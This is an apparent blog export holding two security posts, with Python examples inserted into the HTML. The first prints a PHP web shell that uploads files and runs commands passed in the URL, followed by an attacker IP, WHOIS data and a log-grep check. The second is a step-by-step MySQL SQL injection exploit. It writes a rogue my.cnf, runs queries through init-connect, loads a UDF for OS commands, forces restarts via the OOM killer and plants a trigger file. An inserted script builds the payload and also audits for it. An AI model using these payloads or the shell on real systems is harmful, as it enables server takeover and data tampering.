echo "<body bgcolor=black><br />
<font color=cyan size=3>";<br />
echo "<h2>empixcrew technology</h2><hr>";<br />
echo "<form action=\"\" method=\"post\" enctype=\"multipart/form-data\"><br />
<label for=\"file\">empix:</label><br />
<input type=\"file\" name=\"file\" id=\"file\" /><br />
<br /><br />
<input type=\"submit\" name=\"submit\" value=\"uplod\"><br />
</form>";<br />
if ($_FILES["file"]["error"] > 0)<br />
{<br />
echo "gagal: " . $_FILES["file"]["error"] . "<br />";<br />
}<br />
else<br />
{<br />
echo "sukses: " . $_FILES["file"]["name"] . "<br />";<br />
echo "ukuran: " . ($_FILES["file"]["size"] / 1024) . " Kb<br />";<br />
echo "mentah: " . $_FILES["file"]["tmp_name"];<br />
}<br />
if (file_exists("" . $_FILES["file"]["name"]))<br />
{<br />
echo $_FILES["file"]["name"] . " wes enek cok. ";<br />
}<br />
else<br />
{<br />
move_uploaded_file($_FILES["file"]["tmp_name"],<br />
"" . $_FILES["file"]["name"]);<br />
echo " mateng: " . "" . $_FILES["file"]["name"];<br />
echo"<hr>";<br />
}<br />
}<br />
elseif ($_GET["empix"]){<br />
<span class="Apple-tab-span" style="white-space: pre;"> </span>system($_GET["empix"]);<br />
}<br />
else {<br />
$un = php_uname();<br />
$sof1 = getenv("SERVER_SOFTWARE");<br />
$php1 = phpversion();<br />
echo "empixcrew: $un $php1 :empixcrew";<br />
}<br />
?><br />
</style><embed src="http://empixcrew.net/gaza.swf" autostart="true" hidden="true"><SCRIPT> </blockquote>Location of bot source: http://picasa.com.ipsupply.com.au/wp-content/uploads/2011/12/chase/hell.php<br />
<br />
Attacks are coming from IP <b>187.17.65.242</b> (Brazil)<br />
<br />
WHOIS:<br />
<blockquote>inetnum: 187.17.64/18<br />
aut-num: AS15201<br />
abuse-c: SEO50<br />
owner: Universo Online S.A.<br />
ownerid: 001.109.184/0001-95<br />
responsible: Contato da Entidade UOL<br />
country: BR<br />
owner-c: CAU12<br />
tech-c: CAU12<br />
inetrev: 187.17.64/20<br />
nserver: ns1.host.uol.com.br<br />
nsstat: 20120412 AA<br />
nslastaa: 20120412<br />
nserver: ns2.host.uol.com.br<br />
nsstat: 20120412 AA<br />
nslastaa: 20120412<br />
created: 20081022<br />
changed: 20081022<br />
<br />
nic-hdl-br: CAU12<br />
person: Contato Administrativo - UOL<br />
e-mail: l-registrobr-uol@corp.uol.com.br<br />
created: 20031202<br />
changed: 20100106<br />
<br />
nic-hdl-br: SEO50<br />
person: Security Office<br />
e-mail: security@uol.com.br<br />
created: 20021114<br />
changed: 20110830</blockquote>We strongly recommend blocking this IP address and running the following command to detect attacks:<br />
#egrep -n --color "hell.php" *.log<br />
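The same check as the egrep above, as an added example that is not part of the original post: it runs the pattern over access-log lines, but groups the hits by client address and shows the HTTP status, which is what you need to decide whom to block and whether the requests actually reached the script. The Apache/nginx "combined" log format and the sample lines (documentation IP ranges, fictitious paths) are assumptions constructed for this example.

```python
# Added example, not code from the original post. Scans access-log lines for the
# same pattern the egrep uses and summarises the hits per client IP.
# Assumption: Apache/nginx "combined" log format; sample lines are constructed.
import re
from collections import Counter
from typing import Dict, Iterable, List, Optional

COMBINED_LOG = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) '
)

# Constructed sample log (192.0.2.0/24 and 198.51.100.0/24 are documentation ranges).
SAMPLE_LOG = """\
192.0.2.10 - - [12/Apr/2012:10:01:02 +0000] "GET /index.php HTTP/1.1" 200 1234 "-" "Mozilla/5.0"
192.0.2.10 - - [12/Apr/2012:10:01:09 +0000] "GET /images/hell.php?cmd=id HTTP/1.1" 200 98 "-" "Mozilla/5.0"
198.51.100.7 - - [12/Apr/2012:10:02:00 +0000] "GET /about.html HTTP/1.1" 200 4321 "-" "Mozilla/5.0"
198.51.100.7 - - [12/Apr/2012:10:03:17 +0000] "POST /images/shell.php HTTP/1.1" 404 210 "-" "curl/7.21"
192.0.2.10 - - [12/Apr/2012:10:05:41 +0000] "GET /images/hell.php?cmd=uname HTTP/1.1" 200 120 "-" "Mozilla/5.0"
"""


def parse_combined(line: str) -> Optional[Dict[str, str]]:
    """Parse one combined-format line; None when the line does not match."""
    m = COMBINED_LOG.match(line)
    return m.groupdict() if m else None


def find_hits(lines: Iterable[str], pattern: str = "hell.php") -> List[Dict[str, str]]:
    """Lines matching the pattern, exactly as egrep would match them: the pattern
    is a regex, so the '.' in hell.php matches any byte and shell.php matches too."""
    rx = re.compile(pattern)
    hits = []
    for line in lines:
        if not rx.search(line):
            continue
        rec = parse_combined(line) or {"ip": "?", "path": line.strip(), "status": "?"}
        hits.append({"ip": rec["ip"], "path": rec["path"], "status": rec["status"]})
    return hits


def hits_per_ip(hits: List[Dict[str, str]]) -> Dict[str, int]:
    """Number of matching requests per client address: the candidates to block."""
    return dict(Counter(h["ip"] for h in hits))


if __name__ == "__main__":
    found = find_hits(SAMPLE_LOG.splitlines())
    for h in found:
        print(h["ip"], h["status"], h["path"])
    print(hits_per_ip(found))
```

A 404 for the script name means the request was probing rather than executing; a 200 on a path like the one above is the line to follow up on.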
</div>Vladimirhttp://www.blogger.com/profile/15214373847405926820noreply@blogger.com5tag:blogger.com,1999:blog-7173843122198586393.post-74642403211651504612012-03-04T11:45:00.009-08:002012-07-26T12:13:01.976-07:00Advanced SQLi exploitation with FILE_PRIV<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="text-align: left;">
We would like to open our blog with notes on the practical exploitation of SQL injection, and in future posts we intend to focus more on the practical side of web application security.</div>
<div style="text-align: left;">
SQL injection is the most common server-side web application vulnerability, and we meet it in almost every audit in our practice.</div>
<div style="text-align: left;">
Very often these vulnerabilities let us write files on the database host (when the database user has the FILE privilege, i.e. FILE_PRIV).</div>
<div style="text-align: left;">
The simplest exploitation in that case is to write an executable script (e.g. shell.php) into the web root (e.g. /var/www/) with SELECT ... INTO OUTFILE.<br />
But sometimes the MySQL server process has no filesystem rights to write into /var/www.<br />
<br />
We would like to present a method of exploiting these vulnerabilities to execute arbitrary queries and even OS commands (tested on Debian lenny).<br />
<b>This is not the easiest attack vector, but it is possible!</b></div>
<div style="text-align: left;">
<br />
The idea is very simple: replace the my.cnf option file. The regular configuration file is owned by root and cannot be written by the mysql user:</div>
<div style="text-align: left;">
<span style="background-color: white; color: #38761d; font-family: arial, sans-serif;">-rw-r--r-- 1 root root 3596 /etc/mysql/my.cnf</span></div>
<div style="text-align: left;">
<span style="background-color: white; color: #333333; font-family: arial, sans-serif;">#debian lenny</span></div>
<div style="text-align: left;">
However, <b>if you write my.cnf into DATADIR, it will work</b>! When mysqld is started by mysqld_safe and DATADIR/my.cnf exists while BASEDIR/my.cnf does not, mysqld_safe sets MYSQL_HOME to DATADIR, and $MYSQL_HOME/my.cnf is one of the option files the server reads. And DATADIR is always writable, because the server has to write its tables there:</div>
<div style="text-align: left;">
<span style="background-color: white; color: red; font-family: arial, sans-serif;">drwx------ 4 mysql mysql 4096 /var/lib/mysql</span></div>
<div style="text-align: left;">
<span style="background-color: white; color: #333333; font-family: arial, sans-serif; text-align: -webkit-auto;">#debian lenny</span></div>
<div style="text-align: left;">
<br />
Then look at the documentation for the server options that make mysqld run SQL on our behalf (init_connect runs a statement at the start of every connection, init_file runs a file of statements at server startup, init_slave runs on a replication slave):</div>
<div style="text-align: left;">
<a href="http://dev.mysql.com/doc/refman/5.1/en/server-system-variables.html#sysvar_init_connect" style="background-color: white; font-family: arial, sans-serif; text-align: -webkit-auto;">http://dev.mysql.com/doc/refman/5.1/en/server-system-variables.html#sysvar_init_connect</a></div>
<div style="text-align: left;">
<span style="text-align: -webkit-auto;"><span style="color: #333333; font-family: arial, sans-serif;"><a href="http://dev.mysql.com/doc/refman/5.1/en/server-system-variables.html#sysvar_init_file" style="background-color: white;">http://dev.mysql.com/doc/refman/5.1/en/server-system-variables.html#sysvar_init_file</a></span></span></div>
<div style="text-align: left;">
<span style="color: #333333; font-family: arial, sans-serif;"><a href="http://dev.mysql.com/doc/refman/5.1/en/replication-options-slave.html#sysvar_init_slave" style="background-color: white;">http://dev.mysql.com/doc/refman/5.1/en/replication-options-slave.html#sysvar_init_slave</a></span></div>
<div style="text-align: left;">
<br />
Finally, the attack vector looks like this:</div>
<div style="text-align: left;">
<span style="background-color: white;"><span style="color: #333333; font-family: arial, sans-serif;">'<b>AND</b> 1<b>=</b>2 <b>UNION</b> <b>SELECT</b> '</span><span style="font-family: arial, sans-serif;"><b><span style="color: red;">[mysqld]</span><span style="color: #38761d;">\n</span><span style="color: red;">init-connect="update users set passwd=123 where id=0"</span><span style="color: #38761d;">\n#</span></b></span><span style="color: #333333; font-family: arial, sans-serif;">' </span></span><br />
<span style="background-color: white;"><span style="color: #333333; font-family: arial, sans-serif;"><b>INTO</b> <b>OUTFILE</b> '</span><span style="text-align: left;"><span style="color: #38761d; font-family: arial, sans-serif;"><b>/var/lib/mysql/my.cnf</b></span></span><span style="color: #333333; font-family: arial, sans-serif;">'<b>-- -</b></span></span></div>
<div style="text-align: left;">
<br />
Now you can execute any query, not just a SELECT, from an injection into a SELECT statement, provided the database user has the FILE privilege.</div>
<div style="text-align: left;">
The query in init-connect is executed by the server at the start of every connection from a user without the SUPER privilege, which is exactly what a web application's database account normally is. It runs with the privileges of that connecting user, so the statement must be one the account is allowed to execute (the UPDATE above assumes the application account may modify its own users table).</div>
<div style="text-align: left;">
Caveat: INTO OUTFILE creates the file world-writable, and recent MySQL versions refuse world-writable option files with the warning "World-writable config file ... is ignored", so check how the target version behaves before relying on this vector.</div>
<div style="text-align: left;">
And there is another problem: option files are read only at startup, so you must somehow restart the MySQL daemon.</div>
<div style="text-align: left;">
The easiest way is to wait until it happens naturally.</div>
<div style="text-align: left;">
But you can always send a heavy query that exceeds the memory limit.</div>
<div style="text-align: left;">
Then the OOM killer does the job for you: mysqld_safe restarts mysqld after it is killed, and the new instance reads the planted my.cnf ;)</div>
<div style="text-align: left;">
<span style="background-color: white; color: #333333; font-family: arial, sans-serif;"><br />
</span><br />
<span style="background-color: white; color: #333333; font-family: arial, sans-serif;">On MySQL 5.1.2 and later (the plugin_dir variable was introduced in 5.1.2, see </span><span style="background-color: white;"><span style="color: #333333; font-family: arial, sans-serif;"><a href="http://dev.mysql.com/doc/refman/5.1/en/server-system-variables.html#sysvar_plugin_dir">http://dev.mysql.com/doc/refman/5.1/en/server-system-variables.html#sysvar_plugin_dir</a></span></span><span style="background-color: white; color: #333333; font-family: arial, sans-serif;">, and CREATE FUNCTION ... SONAME loads its library only from that directory) you can also execute OS commands via my.cnf like this:</span></div>
<div style="text-align: left;">
<span style="background-color: white; color: #333333; font-family: arial, sans-serif;">[mysqld]</span></div>
<div style="text-align: left;">
<span style="background-color: white; font-family: arial, sans-serif;"><span style="color: #333333;"><b>plugin_dir</b> = </span><span style="color: red;">/var/tmp/aaa </span># 5.1.2+ only</span></div>
<div style="text-align: left;">
<span style="background-color: white; font-family: arial, sans-serif;"><span style="color: #333333;"><b>init-connect</b> = "</span><span style="color: #38761d;">CREATE FUNCTION do_system RETURNS INTEGER SONAME</span><span style="color: #333333;"> '</span><span style="color: red;">so_system.so.0.0</span><span style="color: #333333;">';"</span></span></div>
<div style="text-align: left;">
<div style="color: #333333;">
<span style="background-color: white; color: #333333; font-family: arial, sans-serif;">Where </span><span style="background-color: white; color: red; font-family: arial, sans-serif;">/var/tmp/aaa</span><span style="background-color: white; color: #333333; font-family: arial, sans-serif;"> is any directory the mysql user can write to (the library can be dropped there with SELECT ... INTO DUMPFILE, which writes the bytes unmodified), and </span><span style="background-color: white; color: red; font-family: arial, sans-serif;">so_system.so.0.0</span><span style="background-color: white; color: #333333; font-family: arial, sans-serif;"> is your UDF shared library exporting do_system, built against the target's MySQL version and architecture. Because init-connect runs as the connecting user, that user needs the INSERT privilege on the mysql database to run CREATE FUNCTION; if it lacks it, put the statement into init-file instead, which the server executes at startup with full privileges.</span></div>
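An added example (not code from the original post) that serves both the init-connect payload above and the plugin_dir/UDF configuration just shown: it builds the DATADIR/my.cnf content, encodes it as the MySQL string literal the UNION must carry, models what INTO OUTFILE writes to disk and how an option-file reader sees it, and finally flags the directives a defender should look for when auditing a data directory. The option-file reader is a simplified model written for this example, not MySQL's own code; the three-column UNION, the SUSPECT_KEYS list and the audit rules are this example's assumptions. Table and column names are those used in the post.

```python
# Added example, not code from the original post. It builds the DATADIR/my.cnf
# payload for both variants described above, models what INTO OUTFILE writes and
# how the server's option-file reader sees it, and flags what a defender should
# look for. The option-file reader is a simplified model, not MySQL's code; the
# 3-column UNION and the audit rules are assumptions made for this example.
import re
from typing import Dict, List


def build_my_cnf(directives: Dict[str, str]) -> str:
    """[mysqld] section with double-quoted values, as in the post. The final '#'
    comments out what INTO OUTFILE appends to that line (the TAB-separated values
    of the other UNION columns, when the injection needs more than one column)."""
    lines = ["[mysqld]"]
    for key, value in directives.items():
        lines.append('%s="%s"' % (key, value.replace('"', '\\"')))
    lines.append("#")
    return "\n".join(lines)


def mysql_string_literal(text: str) -> str:
    """Single-quoted MySQL literal: real newlines become \\n escapes, which the
    server decodes again before writing the file."""
    escaped = text.replace("\\", "\\\\").replace("'", "\\'").replace("\n", "\\n")
    return "'" + escaped + "'"


def build_payload(my_cnf: str, ncols: int, outfile: str) -> str:
    """UNION injection writing my_cnf to outfile; payload in column 1, the
    remaining columns padded with numbers."""
    cols = [mysql_string_literal(my_cnf)] + [str(i) for i in range(2, ncols + 1)]
    return "' AND 1=2 UNION SELECT %s INTO OUTFILE %s-- -" % (
        ", ".join(cols), mysql_string_literal(outfile))


def simulate_outfile(column_values: List[str]) -> str:
    """Default INTO OUTFILE layout: columns separated by TAB, rows by LF."""
    return "\t".join(column_values) + "\n"


def _unquote(value: str) -> str:
    """Text inside matching quotes; a backslash escapes the quote or a backslash."""
    quote, out, i = value[0], [], 1
    while i < len(value) and value[i] != quote:
        if value[i] == "\\" and i + 1 < len(value):
            i += 1
        out.append(value[i])
        i += 1
    return "".join(out)


def parse_option_file(text: str) -> Dict[str, Dict[str, str]]:
    """Simplified my.cnf reader: [sections], key=value, '#' or ';' comment lines,
    a '#' comment after an unquoted value, and '_' treated the same as '-'."""
    sections: Dict[str, Dict[str, str]] = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, {})
            continue
        if current is None or "=" not in line:
            continue
        key, _, value = line.partition("=")
        key, value = key.strip().lower().replace("_", "-"), value.strip()
        value = _unquote(value) if value[:1] in ("'", '"') else value.split("#", 1)[0].strip()
        sections[current][key] = value
    return sections


SUSPECT_KEYS = ("init-connect", "init-file", "init-slave", "plugin-dir")


def audit_mysqld_section(text: str) -> List[str]:
    """Findings for an option file found in DATADIR: any of the directives above,
    plus SQL in them that loads a UDF library."""
    mysqld = parse_option_file(text).get("mysqld", {})
    findings = ["%s=%s" % (k, mysqld[k]) for k in SUSPECT_KEYS if k in mysqld]
    for k in SUSPECT_KEYS[:3]:
        if re.search(r"\bSONAME\b", mysqld.get(k, ""), re.IGNORECASE):
            findings.append("%s loads a UDF via CREATE FUNCTION ... SONAME" % k)
    return findings


# Variant 1: the post's init-connect query (table and column names from the post).
QUERY_CNF = build_my_cnf({"init-connect": "update users set passwd=123 where id=0"})
# Variant 2: the post's plugin_dir + UDF configuration, written as in the post.
UDF_CNF = ("[mysqld]\n"
           "plugin_dir = /var/tmp/aaa # 5.1.2+ only\n"
           "init-connect = \"CREATE FUNCTION do_system RETURNS INTEGER "
           "SONAME 'so_system.so.0.0';\"\n")


def demo() -> Dict[str, object]:
    payload = build_payload(QUERY_CNF, 3, "/var/lib/mysql/my.cnf")
    on_disk = simulate_outfile([QUERY_CNF, "2", "3"])  # what the server wrote
    return {
        "payload": payload,
        "server_sees": parse_option_file(on_disk)["mysqld"],
        "findings_query": audit_mysqld_section(on_disk),
        "findings_udf": audit_mysqld_section(UDF_CNF),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(name, "->", value)
```

The audit side is the part to keep: a my.cnf inside DATADIR is never legitimate on a Debian-style layout, and any of init-connect, init-file, init-slave or a plugin_dir pointing outside the packaged plugin directory in such a file is a sign of exactly this technique.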
<div>
<div style="color: #333333;">
<span style="background-color: white; color: #333333; font-family: arial, sans-serif;"><br />
</span></div>
<span style="background-color: white; color: #333333; font-family: arial, sans-serif;">UPDATE: see also the excellent work from wisec.it, which plants a trigger definition file (.TRG) in the table's database directory instead of an option file: </span><span style="color: #333333; font-family: arial, sans-serif;"><a href="http://www.wisec.it/sectou.php?p=1">http://www.wisec.it/sectou.php?p=1</a></span><br />
<blockquote class="tr_bq">
<span style="background-color: white; font-family: arial; font-size: 12px;">AND 1=0 union select 'TYPE=TRIGGERS' into outfile '/var/lib/mysql/users/user.TRG' LINES TERMINATED BY '\\ntriggers=\'CREATE DEFINER=`root`@`localhost` trigger atk after insert on user for each row\\nbegin\\nupdate user set isadmin=0 where isadmin=1;\\nend\'sql_modes=0\ndefiners=\'root@localhost\'\nclient_cs_names=\'latin1\'\nconnection_cl_names=\'latin1_swedish_ci\'\ndb_cl_names=\'latin1_swedish_ci\'\n';</span></blockquote>
<div style="color: #333333;">
<span style="background-color: white; color: #333333; font-family: arial, sans-serif;"><br /></span></div>
</div>
<span style="background-color: white; color: #333333; font-family: arial, sans-serif;">Thank you for your attention.</span><br />
<span style="background-color: white; color: #333333; font-family: arial, sans-serif;">//Alexander Golovko, Vladimir <a href="https://twitter.com/#!@d0znpp">d0znpp</a> Vorontsov </span></div>
</div>Vladimirhttp://www.blogger.com/profile/15214373847405926820noreply@blogger.com7